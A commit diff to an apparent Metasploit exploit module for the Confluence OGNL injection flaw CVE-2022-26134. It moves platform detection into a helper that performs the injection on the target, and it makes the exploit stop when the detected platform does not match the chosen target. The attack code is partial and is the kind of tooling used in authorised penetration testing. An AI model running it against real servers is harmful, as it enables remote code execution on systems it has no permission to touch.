Check the target platform for compatibility

zeroSteiner · zeroSteiner · commit 339114e3c074 · 2022-06-15T17:11:56.000-04:00
diff --git a/modules/exploits/multi/http/atlassian_confluence_namespace_ognl_injection.rb b/modules/exploits/multi/http/atlassian_confluence_namespace_ognl_injection.rb
@@ -90,10 +90,24 @@ def initialize(info = {})
   end
 
   def check
-    version = get_confluence_version
-    return CheckCode::Unknown unless version
+    confluence_version = get_confluence_version
+    return CheckCode::Unknown unless confluence_version
+
+    vprint_status("Detected Confluence version: #{confluence_version}")
+
+    confluence_platform = get_confluence_platform
+    unless confluence_platform
+      return CheckCode::Safe('Failed to test OGNL injection.')
+    end
+
+    vprint_status("Detected target platform: #{confluence_platform}")
+    CheckCode::Vulnerable('Successfully tested OGNL injection.')
+  end
+
+  def get_confluence_platform
+    # this method gets the platform by exploiting CVE-2022-26134
+    return @confluence_platform if @confluence_platform
 
-    vprint_status("Detected Confluence version: #{version}")
     header = "X-#{Rex::Text.rand_text_alphanumeric(10..15)}"
     ognl = <<~OGNL.gsub(/^\s+/, '').tr("\n", '')
       ${
@@ -110,15 +124,9 @@ def check
       }
     OGNL
     res = inject_ognl(ognl)
+    return nil unless res
 
-    return CheckCode::Unknown unless res
-
-    unless res && res.headers.include?(header)
-      return CheckCode::Safe('Failed to test OGNL injection.')
-    end
-
-    vprint_status("Detected target platform: #{res.headers[header]}")
-    CheckCode::Vulnerable('Successfully tested OGNL injection.')
+    res.headers[header]
   end
 
   def get_confluence_version
@@ -138,6 +146,15 @@ def get_confluence_version
   end
 
   def exploit
+    confluence_platform = get_confluence_platform
+    unless confluence_platform
+      fail_with(Failure::NotVulnerable, 'The target is not vulnerable.')
+    end
+
+    unless confluence_platform.downcase.start_with?('win') == (target['Platform'] == 'win')
+      fail_with(Failure::NoTarget, "The target platform '#{confluence_platform}' is incompatible with '#{target.name}'")
+    end
+
     print_status("Executing #{payload_instance.refname} (#{target.name})")
 
     case target['Type']
